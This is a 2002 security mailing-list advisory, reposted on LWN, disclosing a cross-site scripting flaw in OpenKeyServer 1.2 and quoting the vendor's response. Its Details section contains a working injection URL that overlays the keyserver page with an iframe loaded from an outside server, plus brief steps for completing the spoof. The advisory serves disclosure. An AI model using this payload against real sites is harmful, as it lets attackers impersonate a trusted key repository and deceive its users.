![[LWN Logo]](/images/lcorner.png)
![[LWN.net]](/images/Included.png)
|
|
|
|
From: "Noam Rathaus" <noamr@beyondsecurity.com> To: <vuln-dev@security-focus.com>, <bugtraq@security-focus.com> Subject: Keyservers Cross Site Scripting (When CSS Gets Dangerous) Date: Sat, 20 Apr 2002 09:12:54 +0200 Hi, a while ago we discovered this, we have tried to solve this issue with OKS's developer but with no success, maybe further posting of the issue will help. -------------------------------------------------------------------------------- - SUMMARY <http://www.openkeyserver.org/> OKS (OpenKeyServer) has been developed to cope with the fast growing number of PKS encryption software baring in mind the need for reliability. OKS provides a secure repository for a large amount of PGP public keys. Its architecture is composed of several inter-communicating modules and allows you to scale it to fit your needs. The capacity of OKS goes from keyrings of hundred keys to keyrings of hundreds of thousands. A security vulnerability in the way the server returns results of key queries allows attackers to insert malicious code into existing replies. This is of particular danger when it comes to keyservers, since the key information itself is usually considered as highly trustworthy. DETAILS Vulnerable systems: OpenKeyServer version 1.2 Example: http://search.keyserver.net:11371/pks/lookup?template=netensearch%2Cnetennom atch%2Cnetenerror&search=<iframe%20style="position:absolute;left:0;top:0"%20 %20frameborder=0%20scrolling=0%20noresize%20%20width=800%20height=900%20src= http://www.securiteam.com/openkeyservertemp/></iframe>&op=index (All < should be present and not replaced by <). In order to complete the attack, all you need to do is create a few small HTMLs on your server, causing anyone accessing the above URL to not know he is no longer accessing keyserver.net but rather someone else's server. Vendor response: We have received the following response (Tuesday, March 05, 2002 20:33): "We thank you for informing us of this vulnerability onto our software and we are pleased to announce you that a fix to this trouble will be available into the next release of the OpenKeyServer. Therefore be sure we will provide you with this new version in order for your team to keep your database up-to-date. We remain at your entire disposal and please do not hesitate to contact us for any other remarks regarding our software. Best regards, S. Lemmens" We have not heard from them again, even though we sent them a message requesting information when the newer version will be available. ADDITIONAL INFORMATION The information has been provided by <mailto:experts@securiteam.com> SecurITeam Experts and <mailto:slemmens@veridis.com> Sebastien Lemmens. -------------------------------------------------------------------------------- - Thanks Noam Rathaus CTO Beyond Security Ltd http://www.SecurITeam.com http://www.BeyondSecurity.com